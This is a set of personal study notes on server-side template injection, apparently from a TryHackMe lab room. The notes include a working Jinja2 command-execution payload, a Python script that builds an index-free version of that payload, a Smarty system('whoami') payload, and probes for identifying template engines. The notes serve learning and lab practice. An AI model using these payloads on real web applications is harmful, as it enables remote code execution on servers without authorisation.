SSTI

My notes on Server Side Template Injection taken while solving the SSTI walkthroughs on TryHackMe.

https://tryhackme.com/room/learnssti

Introduction

Occurs when user input ends up inside the template source that the template engine evaluates, instead of being passed to the template as a plain data value. Because template expressions are evaluated on the server, the impact ranges from information disclosure and DoS to privilege escalation and remote code execution. SSTI is found in websites that use a template engine to generate dynamic content.

For example, Jinja2 is a template engine used in Flask applications.

SSTI is a server-side exploit: the injected expression is evaluated by the server's template engine, so it runs with the privileges of the web application process.

Template Engines

Jinja2

Popular in Python applications: it is the default template engine of Flask and is available as an optional backend in Django (whose default is its own template language). It uses {{ }} to evaluate expressions. If the input is not sanitized or filtered properly, malicious expressions can be crafted and executed. For example:

{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("ls")}}

The subclass index (157 here) is not stable: it depends on the Python version and on which modules the target process has already imported, so enumerate the subclass list on the target first and locate the class you need before hard-coding an index.

If we want to pass arguments to the command, subprocess.check_output takes the command and its arguments as a list instead of a single string.

subprocess.check_output(['ls', '-la'])
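Added example (my own code, not from the notes or the TryHackMe room): the gadget chain above reproduced in plain Python. The payload is only attribute access on Python objects, so each hop can be evaluated without a template engine, which also shows why the hard-coded index is fragile and how to write a payload that searches by class name instead. It assumes CPython; the anchor class name (catch_warnings) and the demo command are my choices, and the Jinja2 loop payload is only emitted as a string here, since testing it needs a live Jinja2 target.

```python
"""Jinja2 SSTI gadget chain, evaluated outside the template engine (added example)."""
import sys

# Constructed demo command: runs the current interpreter so the example works
# wherever Python does, instead of relying on ls or echo being present.
DEMO_ARGV = [sys.executable, "-c", "import sys; sys.stdout.write('ssti')"]


def object_subclasses():
    """The list the payload walks: ''.__class__.__mro__[1] is `object`."""
    return "".__class__.__mro__[1].__subclasses__()


def find_subclass_index(name):
    """Index of the first loaded class called `name`, or -1 if it is not loaded.

    The index depends on the Python version and on which modules the target
    process has imported, which is why a fixed [157] breaks across targets.
    """
    for idx, cls in enumerate(object_subclasses()):
        if cls.__name__ == name:
            return idx
    return -1


def builtins_from_any_subclass():
    """Index-independent hop: any class whose __init__ is a Python-level function
    exposes its module globals through __globals__, and every module's globals
    carry __builtins__, which gives us __import__.
    """
    for cls in object_subclasses():
        try:
            init = cls.__dict__.get("__init__")
        except Exception:  # exotic metaclasses; just move on
            continue
        module_globals = getattr(init, "__globals__", None)
        if module_globals is None:  # C slot wrapper or inherited __init__
            continue
        builtins = module_globals.get("__builtins__")
        if builtins is None:
            continue
        # In __main__ it is the builtins module; in imported modules it is the dict.
        return builtins if isinstance(builtins, dict) else vars(builtins)
    raise RuntimeError("no subclass with a Python-level __init__ was found")


def run_via_gadget_chain(argv):
    """Same effect as the notes' payload, without hard-coding a subclass index:
    <class>.__init__.__globals__['__builtins__']['__import__']('subprocess')
    .check_output(argv)
    """
    builtins = builtins_from_any_subclass()
    subprocess = builtins["__import__"]("subprocess")
    return subprocess.check_output(argv)


def index_free_payload(command):
    """Jinja2 payload that finds the gadget class by name instead of by index.

    catch_warnings (from the warnings module) is an assumed anchor: CPython
    imports warnings at startup, so it is almost always in the subclass list.
    """
    return (
        "{% for c in ''.__class__.__mro__[1].__subclasses__() %}"
        "{% if c.__name__ == 'catch_warnings' %}"
        "{{ c.__init__.__globals__['__builtins__']['__import__']('subprocess')"
        ".check_output(" + repr(list(command)) + ") }}"
        "{% endif %}{% endfor %}"
    )


if __name__ == "__main__":
    print("Popen index before anything imports subprocess:", find_subclass_index("Popen"))
    print("command output:", run_via_gadget_chain(DEMO_ARGV))
    print("Popen index afterwards:", find_subclass_index("Popen"))
    print("index-free payload:", index_free_payload(["ls", "-la"]))
```

Running the block twice shows the point: the Popen index printed first may be -1 (subprocess not loaded yet) and only becomes a number once the chain imports it, so a payload copied from one target with its index cannot be assumed to work on another.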

Twig

Default template engine of the Symfony framework in PHP.

Pug/Jade

Known for its clean, indentation-based HTML templating syntax and popular among Node.js developers. Its #{} interpolation evaluates arbitrary JavaScript, so an injected expression can reach Node's child_process module and run system commands from inside the template.

When the command needs arguments, spawnSync takes them as a separate array parameter rather than as part of the command string; that is just how spawnSync works.

Reading a file from the server works the same way: the injected expression calls Node's file-reading functions instead of spawning a process.

Smarty

Used in PHP; it can call PHP functions from within templates, which makes an application that renders user input as a template prone to SSTI. To check whether input reaches the Smarty engine, use the {"Hello"|upper} payload: if HELLO comes back in uppercase, the input was evaluated as a template. System commands can then be executed with {system("")}, for example {system("whoami")}, provided the application has not enabled Smarty's security policy restricting which PHP functions templates may call.

Syntax

Jinja2 and Twig have a similar syntax but different behaviour, which is useful for telling them apart. {{7*'7'}} returns 49 in Twig (the string '7' is coerced to a number), whereas the same expression returns 7777777 in Jinja2 (Python string repetition).

Jade uses #{}, whose contents are evaluated as a JavaScript expression. For example, #{7*7} returns 49 in the output. Cherry on top, Jade can also call JavaScript functions from within the templates.

Real CVE Example

Form Tools 3.1.1 had a Smarty-based SSTI vulnerability: the page title of a user's account information on /clients/account/index.php was rendered through the template engine. Read more about it here: https://vuldb.com/?submit.372318. The TryHackMe SSTI room has a good demonstration of this vulnerability.
